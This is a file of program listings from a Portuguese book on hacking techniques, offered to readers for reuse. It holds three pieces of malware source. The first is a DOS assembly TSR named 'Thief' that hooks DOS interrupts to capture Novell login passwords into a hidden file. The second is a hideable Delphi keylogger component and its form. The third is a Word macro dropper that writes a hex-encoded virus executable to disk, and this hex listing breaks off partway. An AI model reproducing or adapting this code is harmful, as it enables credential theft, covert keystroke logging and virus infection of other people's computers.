Tecnicas para Hackers - Wilson Oliveira

Programas do livro: TÉCNICAS PARA HACKERS – SOLUÇÕES PARA SEGURANÇA 1
Ao Leitor:
Conforme explicado no livro, este ficheiro contém os Programas (com duas ou

mais páginas) para que os possa utilizar sem ter que os re-escrever.
Este ficheiro é enviado por e-mail bem como actualizações futuras ao mesmo
e outras informações relativas ao assunto do livro, privilegiando, desse modo,
os leitores ‘registados’.
Esperamos prestar desse modo o melhor serviço aos nossos leitores.
Qualquer sugestão ou pedido de esclarecimento podem ser dirigidos a

geral@centroatlantico.pt
Versão 1.0 de 31/Jul/2000

2 CENTRO ATLÂNTICO – COLECÇÃO TECNOLOGIAS
Página 67
;
; Thief - Capturador de palavras-chave Novell
; Copyright (c) - Washington High School
;
; Thief v.1.0
;
cseg segment
assume cs:cseg,ds:cseg
org 100h
public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
public cntr,lits,begin
.RADIX 16
start:
push cs
push cs
push cs
pop ds
pop es
mov ax,0fffé
CLI
pop ss
mov sp,ax
STI
jmp begin
oi21 dd ?
ac dw 0
ob dw 80h dup (?)
buff2 db 80h dup (?)
fn db 'c:\testing',0FF,'.tmp',0
search1 db 'LOGIN'
foundf db 0
fh dw 0
flag db 0
cntr dw 0
ni21:
assume cs:cseg,ds:nothing,es:nothing
cmp ax,4b00h
je exec
cmp foundf,0ffh
jne nc
cmp ah,8
je oc
cmp ah,7
je oc
nc:
push ax
mov al,cs:flag
not al
cmp al,0
jne jtov
mov ax,cntr
inc ax
mov cntr,ax
cmp ax,31h
jb jtov
xor ax,ax
mov cntr,ax
mov flag,al
pop ax
pushf
call dword ptr [oi21]
push ds
push cs
pop ds
push ax
push bx
push cx
push dx
jmp short wpwtf
jtov:
pop ax
jmp dword ptr cs:[oi21]
exec: call scanfor
jmp nc
oc:
pushf
call dword ptr cs:[oi21]
assume ds:cseg
push ds
push cs
pop ds
push ax
push bx
push cx
push dx
mov bx,ac
mov [bx],al
inc bx
mov [ac],bx
cmp al,0dh
jne lethro
mov byte ptr [bx],0ah
not cs:[flag]
lethro:
pop dx
pop cx
pop bx
pop ax
pop ds
iret
scanfor:
push ax
push di
push si
push es
push ds
push cs
push cs
pop es
mov si,dx
mov di,offset buff2
moveit:
lodsb
and al,0dfh
stosb
or al,al
jnz moveit
pop ds
mov di,offset buff2
look:
push di
mov si,offset search1
mov cx,5
repe cmpsb
pop di
or cx,cx
jz foundit
inc di
cmp byte ptr [di+5],0
je not_found
jmp look
not_found:
xor ax,ax
mov foundf,al
jmp short endofsearch
foundit:
mov ax,0ffh
mov foundf,al
endofsearch:
pop ds
pop es
pop si
pop di
pop ax
ret
wpwtf:
mov ax,3d02h
mov dx,offset fn
pushf
jnc exist
cmp al,2
je create
jmp lethro
create:
mov ah,3ch
mov dx,offset fn
mov cx,02h+04h
pushf
jnc exist
jmp lethro
exist:
mov fh,ax
mov bx,ax
mov ax,4202h
xor cx,cx
xor dx,dx
pushf
call dword ptr[oi21]
mov cx,[ac]
mov dx,offset ob
sub cx,dx
mov [ac],dx
inc cx
mov bx,fh
mov ah,40h
pushf
mov ah,3é
mov bx,fh
pushf
jmp lethro
lits db 90h
begin:
mov ax,offset ob
mov [ac],ax
mov ax,3521h
int 21h
mov di,offset oi21
mov [di],bx
mov [di+2],es
mov dx,offset ni21
push cs
pop ds
mov ax,2521h
int 21h
mov dx,offset lits
int 27h
cseg ends
end start
Página 72
unit Main;
interface
uses
SysUtils, WinTypes, WinProcs, Classes, Controls,
Forms, StdCtrls, ShellAPI, Keyspy, ExtCtrls;
type
TForm1 = class(TForm)
KeySpy: TKeySpy;
Label1: TLabel;
Label3: TLabel;
GroupBox1: TGroupBox;
Hook: TMemo;
Label4: TLabel;
Label2: TLabel;
Image1: TImage;
Panel1: TPanel;
OnDown: TLabel;
OnUp: TLabel;
ActiveLayout: TLabel;
Label5: TLabel;
procedure Label1Click(Sender: TObject);
procedure KeySpyKeySpyDown(Sender: TObject; Key: Byte; KeyStr: String);
procedure KeySpyKeySpyUp(Sender: TObject; Key: Byte; KeyStr: String);
procedure KeySpyKeyword(Sender: TObject);
procedure KeySpyLayoutChanged(Sender: TObject; Layout: string);
procedure KeySpyActiveTitleChanged(Sender: TObject;
ActiveTitle: String);
procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean);
procedure HookChange(Sender: TObject);
private
public
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
const
OldRet: Boolean = False;
procedure TForm1.Label1Click(Sender: TObject);

begin
ShellExecute(GetDesktopWindow, 'open', 'mailto:aleksey@utilmind.com', nil, nil,
sw_ShowNormal);
end;
procedure TForm1.KeySpyKeySpyDown(Sender: TObject; Key: Byte;

KeyStr: String);
begin
OnDown.Caption:= 'OnKeySpyDown: Key = ' + IntToStr(Key) + ', KeyStr = ' +
KeyStr;
if (KeyStr[1] = '-') and (KeyStr[2] = '-') then
begin
Hook.Lines.Add('');
OldRet:= True;
end
else
if OldRet then
begin
Hook.Lines.Add('');
OldRet:= False;
end;
Hook.Text:= Hook.Text + KeyStr;
{ For 16-bit only}

{$IFNDEF WIN32}
if (Length(Hook.Text) > $F0) then Hook.Clear;
{$ENDIF}
end;
procedure TForm1.KeySpyKeySpyUp(Sender: TObject; Key: Byte;

KeyStr: String);
begin
OnUp.Caption:= 'OnKeySpyUp: Key = ' + IntToStr(Key) + ', KeyStr = ' + KeyStr;
end;
procedure TForm1.KeySpyKeyword(Sender: TObject);

begin
if Visible then
Application.MessageBox('Type ''keyword'' to restore window.', 'Hiding...',
mb_Ok or mb_IconInformation);
Visible:= not Visible;
if Visible then ShowWindow(Application.Handle, sw_Show)
else ShowWindow(Application.Handle, sw_Hide);
end;
procedure TForm1.KeySpyLayoutChanged(Sender: TObject; Layout: string);

begin
if Layout = '00000419' then
begin
Layout:= Layout + ' (Russian)';
KeySpy.SpyLayout:= klRussian;
end else
if Layout = '00000410' then
begin
Layout:= Layout + ' (Italian (standard))';
KeySpy.SpyLayout:= klItalian;
end
else
begin
KeySpy.SpyLayout:= klAmerican;
if Layout = '00000409' then Layout:= Layout + ' (US English)' else
if Layout = '00000422' then Layout:= Layout + ' (Ukrainian)' else
if Layout = '00000423' then Layout:= Layout + ' (Belorusian)' else
if Layout = '0000040C' then Layout:= Layout + ' (French (standard))' else
if Layout = '00000407' then Layout:= Layout + ' (German (standard))' else
if Layout = '00000C0A' then Layout:= Layout + ' (Spanish (standard))';
end;
ActiveLayout.Caption:= Layout;
end;
procedure TForm1.KeySpyActiveTitleChanged(Sender: TObject;

ActiveTitle: String);
begin
Label5.Caption:= ActiveTitle;
OldRet:= True;
Hook.Text:= Hook.Text + #13#10'[' + ActiveTitle + ']';
{ For 16-bit only}

{$IFNDEF WIN32}
if (Length(Hook.Text) > $F0) then Hook.Clear;
{$ENDIF}
end;
procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);

begin
{}
CanClose:= True;
end;
end.
Página 75
unit KeySpy;
interface
uses
{$IFDEF WIN32} Windows, {$ELSE} WinTypes, WinProcs,{$ENDIF}
SysUtils, Controls, Classes, Messages, Forms;
type
TSpyLayout = (klAmerican, klItalian, klRussian, klPortuguese);
TOnKeySpy = procedure(Sender: TObject; Key: Byte; KeyStr: String) of object;
{$IFDEF Win32}
TOnLayoutChanged = procedure(Sender: TObject; Layout: String) of object;
{$ENDIF}
TOnActiveWindowChanged = procedure(Sender: TObject; ActiveTitle: String) of
object;
TKeySpy = class(TComponent)
private
{$IFDEF Win32}
CurrentLayout: String;
FActiveLayout: String;
{$ENDIF}
CurrentActiveWindowTitle: String;
FActiveWindowTitle: String;
FSpyLayout: TSpyLayout;
FWindowHandle: HWnd;
FOnKeySpyDown, FOnKeySpyUp: TOnKeySpy;
FOnKeyword: TNotifyEvent;
{$IFDEF Win32}
FOnLayoutChanged: TOnLayoutChanged;
{$ENDIF}
FOnActiveWindowChanged: TOnActiveWindowChanged;
FEnabled: Boolean;
FKeyword,
KeyComp: String;
OldKey: Byte;
LShiftUp, RShiftUp: Boolean;
procedure UpdateTimer;
procedure SetEnabled(Value: Boolean);
procedure SetKeyword(Value: String);
procedure WndProc(var Msg: TMessage);
procedure SetNothingStr(Value: String);
protected
procedure KeySpy; dynamic;
public
constructor Create(AOwner: TComponent); override;
destructor Destroy; override;
published
property ActiveWindowTitle: String read FActiveWindowTitle write
SetNothingStr;
property Enabled: Boolean read FEnabled write SetEnabled;
property Keyword: String read FKeyword write SetKeyword;
property SpyLayout: TSpyLayout read FSpyLayout write FSpyLayout;
{$IFDEF Win32}
property ActiveLayout: String read FActiveLayout write FActiveLayout;
{$ENDIF}
property OnKeySpyDown: TOnKeySpy read FOnKeySpyDown write FOnKeySpyDown;
property OnKeySpyUp: TOnKeySpy read FOnKeySpyUp write FOnKeySpyUp;
property OnKeyword: TNotifyEvent read FOnKeyword write FOnKeyword;
{$IFDEF Win32}
property OnLayoutChanged: TOnLayoutChanged read FOnLayoutChanged write
FOnLayoutChanged;
{$ENDIF}
property OnActiveTitleChanged: TOnActiveWindowChanged read
FOnActiveWindowChanged write FOnActiveWindowChanged;
end;
procedure Register;
implementation
{$I KLayouts.inc}
constructor TKeySpy.Create(AOwner: TComponent);

begin
inherited Create(AOwner);
LShiftUp:= True;
RShiftUp:= True;
FEnabled:= True;
FWindowHandle:= AllocateHWnd(WndProc);
if FEnabled then UpdateTimer;
end;
destructor TKeySpy.Destroy;
begin
FEnabled:= False;
UpdateTimer;
DeallocateHWnd(FWindowHandle);
inherited Destroy;
end;
procedure TKeySpy.WndProc(var Msg: TMessage);

begin
with Msg do
if Msg = WM_TIMER then
try
KeySpy;
except
Application.HandleException(Self);
end
else
Result:= DefWindowProc(FWindowHandle, Msg, wParam, lParam);
end;
procedure TKeySpy.UpdateTimer;
var
b: Byte;
begin
KillTimer(FWindowHandle, 1);
if FEnabled then
begin
asm
mov al, 60h
mov b, al
end;
OldKey:= b;
if SetTimer(FWindowHandle, 1, 1, nil) = 0 then
raise EOutOfResources.Create('No timers');
end;
end;
procedure TKeySpy.SetEnabled(Value: Boolean);

begin
if Value <> FEnabled then
begin
FEnabled:= Value;
UpdateTimer;
end;
end;
procedure TKeySpy.SetKeyword(Value: String);

begin
Value:= LowerCase(Value);
if Value <> FKeyword then
FKeyword:= Value;
end;
procedure TKeySpy.KeySpy;
var
PC: Array[0..$FFF] of Char;
Key: Byte;
St: String;
Wnd: hWnd;
begin
{$IFDEF Win32}
Wnd:= GetForegroundWindow;
{$ELSE}
Wnd:= GetActiveWindow;
{$ENDIF}
SendMessage(Wnd, wm_GetText, $FFF, LongInt(@PC));
FActiveWindowTitle:= StrPas(PC);
if CurrentActiveWindowTitle <> FActiveWindowTitle then
begin
CurrentActiveWindowTitle:= FActiveWindowTitle;
if Assigned(FOnActiveWindowChanged) then
FOnActiveWindowChanged(Self, FActiveWindowTitle);
end;
{$IFDEF Win32}
GetKeyboardLayoutName(PC);
FActiveLayout:= StrPas(PC);
if (FActiveLayout <> CurrentLayout) then
begin
CurrentLayout:= FActiveLayout;
if Assigned(FOnLayoutChanged) then
FOnLayoutChanged(Self, FActiveLayout);
end;
{$ENDIF}
asm
in al, 60h
mov Key, al
end;
if Key = 170 then
begin
Key:= 84;
LShiftUp:= True;
end;
if Key = 182 then
begin
Key:= 85;
RShiftUp:= True;
end;
if Key = 42 then LShiftUp:= False;
if Key = 54 then RShiftUp:= False;
if Key <> OldKey then
begin
OldKey:= Key;
if Key <= 88 then
begin
case FSpyLayout of
klAmerican: if LShiftUp and RShiftUp then
St:= StrPas(LowButtonName[Key])
else
St:= StrPas(HiButtonName[Key]);
klItalian: if LShiftUp and RShiftUp then
St:= StrPas(ItalianLowButtonName[Key])
else
St:= StrPas(ItalianHiButtonName[Key]);
klRussian: if LShiftUp and RShiftUp then
St:= StrPas(RussianLowButtonName[Key])
else
St:= StrPas(RussianHiButtonName[Key]);
klPortuguese: if LShiftUp and RShiftUp then
St:= StrPas(PortugueseLowButtonName[Key])
else
St:= StrPas(PortugueseHiButtonName[Key]);
end;
if Assigned(FOnKeySpyDown) then
FOnKeySpyDown(Self, Key, St);
if Assigned(FOnKeyword) then
begin
KeyComp:= KeyComp + St;
if Length(KeyComp) > Length(FKeyword) then
begin
Move(KeyComp[Length(St) + 1], KeyComp[1], Length(KeyComp));
{$IFDEF WIN32}
SetLength(KeyComp, Length(FKeyword));
{$ELSE}
KeyComp[0]:= char(Length(FKeyword));
{$ENDIF}
end;
if LowerCase(KeyComp) = FKeyword then
FOnKeyword(Self);
end;
end
else
if Key - 128 <= 88 then
begin
case FSpyLayout of
klAmerican: if LShiftUp and RShiftUp then
St:= StrPas(LowButtonName[Key - 128])
else
St:= StrPas(HiButtonName[Key - 128]);
klItalian: if LShiftUp and RShiftUp then
St:= StrPas(ItalianLowButtonName[Key - 128])
else
St:= StrPas(ItalianHiButtonName[Key - 128]);
klRussian: if LShiftUp and RShiftUp then
St:= StrPas(RussianLowButtonName[Key - 128])
else
St:= StrPas(RussianHiButtonName[Key - 128]);
klPortuguese: if LShiftUp and RShiftUp then
St:= StrPas(PortugueseLowButtonName[Key])
else
St:= StrPas(PortugueseHiButtonName[Key]);
end;
if Assigned(FOnKeySpyUp) then
FOnKeySpyUp(Self, Key, St)
end;
end;
end;
procedure TKeySpy.SetNothingStr(Value: String); begin {} end;
procedure Register;
begin
RegisterComponents('UtilMind', [TKeySpy]);
end;
end.
Página 117
Sub MAIN
caminho$ = Ambiente$("LEGADO")
If caminho$ = "NOWAY" Then Goto NoDropper
If Hora(Agora()) < 5 + 12 Then
Goto NoDropper
End If
Open "C:\legado.SCR" For Output As #1 'Joga o script
Print #1, "N c:\legado.com"
Print #1, "E0100 4D 5A 60 00 10 00 70 00 1E 00 E0 02 E0 02 58 02"
Print #1, "E0110 00 25 00 00 54 08 00 00 1C 00 00 00 2D 00 00 00"
Print #1, "E0120 3C 00 00 00 4C 00 00 00 5E 00 00 00 8D 00 00 00"
Print #1, "E0130 E6 00 00 00 F5 00 00 00 04 01 00 00 13 01 00 00"
Print #1, "E0140 26 01 00 00 31 01 00 00 6B 01 00 00 79 01 00 00"
Print #1, "E0150 93 01 00 00 BB 01 00 00 22 02 00 00 37 02 00 00"
Print #1, "E0160 56 02 00 00 64 02 00 00 73 02 00 00 81 02 00 00"
Print #1, "E0170 9B 02 00 00 B5 02 00 00 D0 02 00 00 DA 02 00 00"
Print #1, "E0180 E9 02 00 00 F7 02 00 00 07 03 00 00 15 03 00 00"
Print #1, "E0190 2F 03 00 00 49 03 00 00 53 03 00 00 5D 03 00 00"
Print #1, "E01A0 6C 03 00 00 7A 03 00 00 8A 03 00 00 98 03 00 00"
Print #1, "E01B0 A9 03 00 00 C3 03 00 00 DD 03 00 00 F8 03 00 00"
Print #1, "E01C0 02 04 00 00 0C 04 00 00 5C 04 00 00 84 04 00 00"
Print #1, "E01D0 8E 04 00 00 B2 04 00 00 BC 04 00 00 CE 04 00 00"
Print #1, "E01E0 FA 04 00 00 08 05 00 00 19 05 00 00 29 05 00 00"
Print #1, "E01F0 38 05 00 00 52 05 00 00 6D 05 00 00 88 05 00 00"
Print #1, "E0200 93 05 00 00 A7 05 00 00 B1 05 00 00 C0 05 00 00"
Print #1, "E0210 C5 05 00 00 CF 05 00 00 DE 05 00 00 E3 05 00 00"
Print #1, "E0220 E8 05 00 00 F7 05 00 00 02 06 00 00 0D 06 00 00"
Print #1, "E0230 5D 06 00 00 99 06 00 00 A4 06 00 00 B4 06 00 00"
Print #1, "E0240 BF 06 00 00 CF 06 00 00 DA 06 00 00 FF 06 00 00"
Print #1, "E0250 0F 07 00 00 1E 07 00 00 5C 07 00 00 6F 07 00 00"
Print #1, "E0260 74 07 00 00 83 07 00 00 96 07 00 00 A0 07 00 00"
Print #1, "E0270 B1 07 00 00 BB 07 00 00 D0 07 00 00 DA 07 00 00"
Print #1, "E0280 EB 07 00 00 F5 07 00 00 57 08 00 00 5C 08 00 00"
Print #1, "E0290 73 08 00 00 7D 08 00 00 86 08 00 00 94 08 00 00"
Print #1, "E02A0 A2 08 00 00 AA 08 00 00 C0 08 00 00 BE 02 8D 00"
Print #1, "E02B0 09 00 BF 00 24 00 BF 00 37 00 BF 00 3B 01 BF 00"
Print #1, "E02C0 01 00 21 01 1B 01 21 01 B5 02 21 01 45 09 21 01"
Print #1, "E02D0 60 09 21 01 76 09 21 01 95 09 21 01 00 00 00 00"
Print #1, "E02E0 55 89 E5 81 EC 80 01 8C D3 8E C3 8C DB FC 8D BE"
Print #1, "E02F0 00 FF C5 76 06 AC AA 91 30 ED F3 A4 8E DB 8D BE"
Print #1, "E0300 80 FE 16 57 8D BE 00 FF 16 57 9A 3F 04 21 01 8D"
Print #1, "E0310 BE 80 FE 16 57 B8 80 00 50 9A 7A 04 21 01 8D BE"
Print #1, "E0320 80 FE 16 57 BF 72 06 1E 57 9A 93 00 8D 00 FF 36"
Print #1, "E0330 74 06 FF 36 72 06 BF 66 06 1E 57 9A 55 01 8D 00"
Print #1, "E0340 A1 6C 06 A3 58 06 A1 6E 06 A3 5A 06 A1 70 06 A3"
Print #1, "E0350 5C 06 A1 6A 06 A3 60 06 A1 68 06 A3 62 06 A1 66"
Print #1, "E0360 06 A3 64 06 8D BE 80 FE 16 57 9A FB 04 21 01 89"
Print #1, "E0370 EC 5D CA 04 00 55 89 E5 81 EC 80 01 8C D3 8E C3"
Print #1, "E0380 8C DB FC 8D BE 00 FF C5 76 06 AC AA 91 30 ED F3"
Print #1, "E0390 A4 8E DB A1 58 06 A3 6C 06 A1 5A 06 A3 6E 06 A1"
Print #1, "E03A0 5C 06 A3 70 06 A1 60 06 A3 6A 06 A1 62 06 A3 68"
Print #1, "E03B0 06 A1 64 06 A3 66 06 8D BE 80 FE 16 57 8D BE 00"
Print #1, "E03C0 FF 16 57 9A 3F 04 21 01 8D BE 80 FE 16 57 B8 80"
Print #1, "E03D0 00 50 9A 7A 04 21 01 BF 66 06 1E 57 BF 72 06 1E"
Print #1, "E03E0 57 9A 99 01 8D 00 8D BE 80 FE 16 57 B8 80 00 50"
Print #1, "E03F0 9A 7A 04 21 01 8D BE 80 FE 16 57 FF 36 74 06 FF"
Print #1, "E0400 36 72 06 9A BA 00 8D 00 8D BE 80 FE 16 57 9A FB"
Print #1, "E0410 04 21 01 89 EC 5D CA 04 00 55 89 E5 81 EC 10 01"
Print #1, "E0420 8C D3 8E C3 8C DB FC 8D BE FE FE C5 76 06 AC AA"
Print #1, "E0430 91 30 ED F3 A4 8E DB C7 86 F0 FE 01 00 BF D6 00"
Print #1, "E0440 1E 57 8D BE FE FE 16 57 9A 3F 04 21 01 BF D6 00"
Print #1, "E0450 1E 57 B8 01 00 50 9A 7A 04 21 01 BF D6 00 1E 57"
Print #1, "E0460 8D BE F4 FE 16 57 B8 0A 00 50 8D BE F2 FE 16 57"
Print #1, "E0470 9A 65 05 21 01 8A 86 F6 FE 3A 06 05 00 75 10 8A"
Print #1, "E0480 86 F7 FE 3A 06 06 00 75 06 C6 46 FF 01 EB 04 C6"
Print #1, "E0490 46 FF 00 BF D6 00 1E 57 9A FB 04 21 01 8A 46 FF"
Print #1, "E04A0 89 EC 5D CA 04 00 0B 56 49 52 54 45 4D 50 2E 54"
Print #1, "E04B0 4D 50 0B 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 0B 76"
Print #1, "E04C0 69 72 74 65 6D 70 2E 74 6D 70 0B 76 69 72 74 65"
Print #1, "E04D0 6D 70 2E 54 4D 50 55 89 E5 81 EC 64 27 8C D3 8E"
Print #1, "E04E0 C3 8C DB FC 8D BE 00 FF C5 76 06 AC AA 91 30 ED"
Print #1, "E04F0 F3 A4 8E DB 8D BE 00 FF 16 57 BF C6 01 0E 57 9A"
Print #1, "E0500 EA 07 21 01 75 03 E9 EF 01 8D BE 00 FF 16 57 BF"
Print #1, "E0510 D2 01 0E 57 9A EA 07 21 01 75 03 E9 DA 01 8D BE"
Print #1, "E0520 00 FF 16 57 0E E8 B8 FD BF 56 01 1E 57 8D BE 00"
Print #1, "E0530 FF 16 57 9A 3F 04 21 01 BF 56 01 1E 57 B8 01 00"
Print #1, "E0540 50 9A 7A 04 21 01 BF D6 01 1E 57 BF DE 01 0E 57"
Print #1, "E0550 9A 3F 04 21 01 BF D6 01 1E 57 B8 01 00 50 9A 83"
Print #1, "E0560 04 21 01 BF 56 01 1E 57 8D BE A0 D8 16 57 B8 00"
Print #1, "E0570 08 50 8D BE 9E D8 16 57 9A 65 05 21 01 BF D6 01"
Print #1, "E0580 1E 57 8D BE A0 D8 16 57 FF B6 9E D8 8D BE 9C D8"
Print #1, "E0590 16 57 9A 6C 05 21 01 83 BE 9E D8 00 74 0A 8B 86"
Print #1, "E05A0 9C D8 3B 86 9E D8 74 BB BF 56 01 1E 57 9A FB 04"
Print #1, "E05B0 21 01 BF D6 01 1E 57 9A FB 04 21 01 BF 56 01 1E"
Print #1, "E05C0 57 BF 76 06 1E 57 9A 3F 04 21 01 BF 56 01 1E 57"
Print #1, "E05D0 B8 01 00 50 9A 7A 04 21 01 BF D6 01 1E 57 8D BE"
Print #1, "E05E0 00 FF 16 57 9A 3F 04 21 01 BF D6 01 1E 57 B8 01"
Print #1, "E05F0 00 50 9A 83 04 21 01 BF 56 01 1E 57 8D BE A0 E0"
Print #1, "E0600 16 57 B8 60 1E 50 8D BE 9E D8 16 57 9A 65 05 21"
Print #1, "E0610 01 BF D6 01 1E 57 8D BE A0 E0 16 57 FF B6 9E D8"
Print #1, "E0620 8D BE 9C D8 16 57 9A 6C 05 21 01 BF 56 01 1E 57"
Print #1, "E0630 9A FB 04 21 01 BF D6 01 1E 57 9A FB 04 21 01 BF"
Print #1, "E0640 56 01 1E 57 BF EA 01 0E 57 9A 3F 04 21 01 BF 56"
Print #1, "E0650 01 1E 57 B8 01 00 50 9A 7A 04 21 01 BF D6 01 1E"
Print #1, "E0660 57 8D BE 00 FF 16 57 9A 3F 04 21 01 BF D6 01 1E"
Print #1, "E0670 57 B8 01 00 50 9A 7A 04 21 01 BF D6 01 1E 57 B8"
Print #1, "E0680 60 1E 31 D2 52 50 9A CD 05 21 01 BF 56 01 1E 57"
Print #1, "E0690 8D BE A0 E0 16 57 B8 60 1E 50 8D BE 9E D8 16 57"
Print #1, "E06A0 9A 65 05 21 01 BF D6 01 1E 57 8D BE A0 E0 16 57"
Print #1, "E06B0 FF B6 9E D8 8D BE 9C D8 16 57 9A 6C 05 21 01 83"
Print #1, "E06C0 BE 9E D8 00 74 0A 8B 86 9C D8 3B 86 9E D8 74 BB"
Print #1, "E06D0 BF 56 01 1E 57 9A FB 04 21 01 BF D6 01 1E 57 9A"
Print #1, "E06E0 FB 04 21 01 BF 56 01 1E 57 9A FD 05 21 01 8D BE"
Print #1, "E06F0 00 FF 16 57 0E E8 7D FC 89 EC 5D CA 04 00 55 89"
Print #1, "E0700 E5 81 EC 00 04 8C D3 8E C3 8C DB FC 8D BE 00 FF"
Print #1, "E0710 C5 76 0A AC AA 91 30 ED F3 A4 8D BE 00 FE C5 76"
Print #1, "E0720 06 AC AA 91 30 ED F3 A4 8E DB 8D BE 00 FF 16 57"
Print #1, "E0730 B8 20 00 50 BF C8 06 1E 57 9A D9 00 8D 00 83 3E"
Print #1, "E0740 F4 06 00 75 6D 83 3E C6 06 28 7D 66 80 3E E6 06"
Print #1, "E0750 00 75 02 EB 5D 8D BE 00 FD 16 57 8D BE 00 FE 16"
Print #1, "E0760 57 9A F9 06 21 01 BF E6 06 1E 57 9A 78 07 21 01"
Print #1, "E0770 0E E8 A5 FC 08 C0 75 2E FF 06 C6 06 83 3E C6 06"
Print #1, "E0780 28 7D 21 8D BE 00 FC 16 57 8D BE 00 FE 16 57 9A"
Print #1, "E0790 F9 06 21 01 BF E6 06 1E 57 9A 78 07 21 01 0E E8"
Print #1, "E07A0 34 FD EB 02 EB 0C BF C8 06 1E 57 9A 17 01 8D 00"
Print #1, "E07B0 EB 8C 89 EC 5D CA 08 00 0B 76 69 72 74 65 6D 70"
Print #1, "E07C0 2E 74 6D 70 01 20 55 89 E5 81 EC 04 0C 8D 7E 80"
Print #1, "E07D0 16 57 BF 76 06 1E 57 9A 3F 04 21 01 8D 7E 80 16"
Print #1, "E07E0 57 B8 01 00 50 9A 7A 04 21 01 8D 7E 80 16 57 B8"
Print #1, "E07F0 60 1E 31 D2 52 50 9A CD 05 21 01 8D BE 00 FF 16"
Print #1, "E0800 57 BF D8 04 0E 57 9A 3F 04 21 01 8D BE 00 FF 16"
Print #1, "E0810 57 B8 01 00 50 9A 83 04 21 01 8D 7E 80 16 57 8D"
Print #1, "E0820 BE FC F6 16 57 B8 00 08 50 8D BE FE FE 16 57 9A"
Print #1, "E0830 65 05 21 01 8D BE 00 FF 16 57 8D BE FC F6 16 57"
Print #1, "E0840 FF B6 FE FE 8D BE FC FE 16 57 9A 6C 05 21 01 83"
Print #1, "E0850 BE FE FE 00 74 0A 8B 86 FC FE 3B 86 FE FE 74 BA"
Print #1, "E0860 8D 7E 80 16 57 9A FB 04 21 01 8D BE 00 FF 16 57"
Print #1, "E0870 9A FB 04 21 01 BF D8 04 0E 57 8D BE FC F5 16 57"
Print #1, "E0880 B8 01 00 50 9A 71 06 21 01 BF E4 04 0E 57 9A 78"
Print #1, "E0890 07 21 01 8D BE FC F4 16 57 B8 02 00 50 9A 71 06"
Print #1, "E08A0 21 01 9A 78 07 21 01 BF E4 04 0E 57 9A 78 07 21"
Print #1, "E08B0 01 8D BE FC F3 16 57 B8 03 00 50 9A 71 06 21 01"
Print #1, "E08C0 9A 78 07 21 01 9A 3F 02 8D 00 8D BE 00 FF 16 57"
Print #1, "E08D0 B8 80 00 50 9A 83 04 21 01 8D BE 00 FF 16 57 9A"
Print #1, "E08E0 FB 04 21 01 8D BE 00 FF 16 57 9A FD 05 21 01 89"
Print #1, "E08F0 EC 5D CB 0E 63 3A 5C 63 6F 6D 6D 61 6E 64 2E 63"
Print #1, "E0900 6F 6D 09 63 3A 5C 69 6F 2E 73 79 73 12 63 3A 5C"
Print #1, "E0910 77 69 6E 64 6F 77 73 5C 77 69 6E 2E 63 6F 6D 55"
Print #1, "E0920 89 E5 81 EC 8A 00 8D 7E FA 16 57 8D 7E FE 16 57"
Print #1, "E0930 8D 7E FC 16 57 8D 7E F8 16 57 9A 00 00 8D 00 C6"
Print #1, "E0940 46 F7 00 81 7E FA CE 07 75 10 83 7E FE 07 72 0A"
Print #1, "E0950 83 7E FC 0C 72 04 C6 46 F7 01 81 7E FA CE 07 76"
Print #1, "E0960 04 C6 46 F7 01 80 7E F7 00 74 51 8D BE 76 FF 16"
Print #1, "E0970 57 BF 13 06 0E 57 9A 3F 04 21 01 8D BE 76 FF 16"
Print #1, "E0980 57 9A FD 05 21 01 8D BE 76 FF 16 57 BF 22 06 0E"
Print #1, "E0990 57 9A 3F 04 21 01 8D BE 76 FF 16 57 9A FD 05 21"
Print #1, "E09A0 01 8D BE 76 FF 16 57 BF 2C 06 0E 57 9A 3F 04 21"
Print #1, "E09B0 01 8D BE 76 FF 16 57 9A FD 05 21 01 89 EC 5D CB"
Print #1, "E09C0 04 50 41 54 48 06 5C 2A 2E 63 6F 6D 01 5C 06 5C"
Print #1, "E09D0 2A 2E 65 78 65 55 89 E5 81 EC 04 04 9A D8 02 8D"
Print #1, "E09E0 00 8D BE FE FC 16 57 BF E0 06 0E 57 9A D1 01 8D"
Print #1, "E09F0 00 8D BE FE FD 16 57 B8 FF 00 50 9A 13 07 21 01"
Print #1, "E0A00 C6 86 FE FE 00 8A 86 FE FD 30 E4 89 86 FC FD B8"
Print #1, "E0A10 01 00 3B 86 FC FD 7E 03 E9 D1 00 89 46 FE EB 03"
Print #1, "E0A20 FF 46 FE 8B 7E FE 80 BB FE FD 3B 74 3A 8D BE FC"
Print #1, "E0A30 FB 16 57 8D BE FE FE 16 57 9A F9 06 21 01 8D BE"
Print #1, "E0A40 FC FC 16 57 8B 7E FE 8A 83 FE FD 50 9A 15 08 21"
Print #1, "E0A50 01 9A 78 07 21 01 8D BE FE FE 16 57 B8 FF 00 50"
Print #1, "E0A60 9A 13 07 21 01 EB 79 8D BE FC FC 16 57 8D BE FE"
Print #1, "E0A70 FE 16 57 9A F9 06 21 01 BF E5 06 0E 57 9A 78 07"
Print #1, "E0A80 21 01 8D BE FC FB 16 57 8D BE FE FE 16 57 9A F9"
Print #1, "E0A90 06 21 01 BF EC 06 0E 57 9A 78 07 21 01 0E E8 5D"
Print #1, "E0AA0 FC 8D BE FC FC 16 57 8D BE FE FE 16 57 9A F9 06"
Print #1, "E0AB0 21 01 BF EE 06 0E 57 9A 78 07 21 01 8D BE FC FB"
Print #1, "E0AC0 16 57 8D BE FE FE 16 57 9A F9 06 21 01 BF EC 06"
Print #1, "E0AD0 0E 57 9A 78 07 21 01 0E E8 23 FC C6 86 FE FE 00"
Print #1, "E0AE0 8B 46 FE 3B 86 FC FD 74 03 E9 34 FF 89 EC 5D CB"
Print #1, "E0AF0 05 2A 2E 63 6F 6D 00 05 2A 2E 65 78 65 55 89 E5"
Print #1, "E0B00 31 C0 A3 C6 06 BF 10 08 0E 57 BF 16 08 0E 57 0E"
Print #1, "E0B10 E8 EB FB BF 17 08 0E 57 BF 16 08 0E 57 0E E8 DD"
Print #1, "E0B20 FB 0E E8 B0 FE 5D CB 06 4C 45 47 41 44 4F 05 4E"
Print #1, "E0B30 4F 57 41 59 9A 00 00 21 01 9A 0D 00 BF 00 55 89"
Print #1, "E0B40 E5 81 EC 00 01 8D BE 00 FF 16 57 BF 47 08 0E 57"
